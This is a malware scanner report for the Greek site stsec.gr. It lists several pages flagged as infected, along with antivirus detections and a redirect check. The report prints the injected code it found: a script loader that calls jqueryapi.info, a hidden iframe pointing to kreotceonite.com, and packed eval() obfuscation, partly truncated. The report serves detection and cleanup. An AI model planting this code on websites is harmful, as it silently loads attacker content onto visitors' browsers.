OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=article&id=88&Itemid=210	200 OK Content-Length: 66373 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI
http://stsec.gr/index.php?option=com_content&view=article&id=118&Itemid=219	200 OK Content-Length: 48164 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo ... 3346 bytes are skipped ....createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]\|\|e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, ... 15681 bytes are skipped ...200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape)); Antivirus reports: Avast JS:Iframe-EGI [Trj] Fortinet JS/Iframe.KI!tr ESET-NOD32 JS/Iframe.KI

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: stsec.gr

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Mar 2015 03:09:22 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 03 Mar 2015 03:09:22 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 957ff2e1829ac22480248c0a915c6996=5laqv1viqea7gntbm50md8i6u4; path=/

Second query (visit from search engine):
GET / HTTP/1.1
Host: stsec.gr
Referer: http://www.google.com/search?q=stsec.gr

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for stsec.gr

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools